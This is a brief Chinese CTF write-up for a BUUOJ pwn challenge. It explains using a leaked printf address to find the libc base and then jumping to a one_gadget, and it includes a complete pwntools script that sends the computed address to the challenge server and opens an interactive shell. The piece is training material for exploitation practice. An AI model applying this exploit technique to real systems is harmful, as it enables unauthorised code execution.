到ida看一下伪代码
函数输出了printf的地址,给了libc,利用one_gadget就可以的到libc的基址
这里需要自己试一下,这里是最后一个gadget
from pwn import *
p=remote('node3.buuoj.cn',25100)
elf=ELF('./one_gadget')
context.log_level='debug'
libc = ELF('./libc-2.29.so')
p.recvuntil('0x')
printf_addr=int(p.recv(12),16)
libc_base=printf_addr-libc.symbols['printf']
one_gadget=0x106ef8
flag=libc_base+one_gadget
p.recvuntil('Give me your one gadget:')
p.sendline(str(flag))
p.interactive()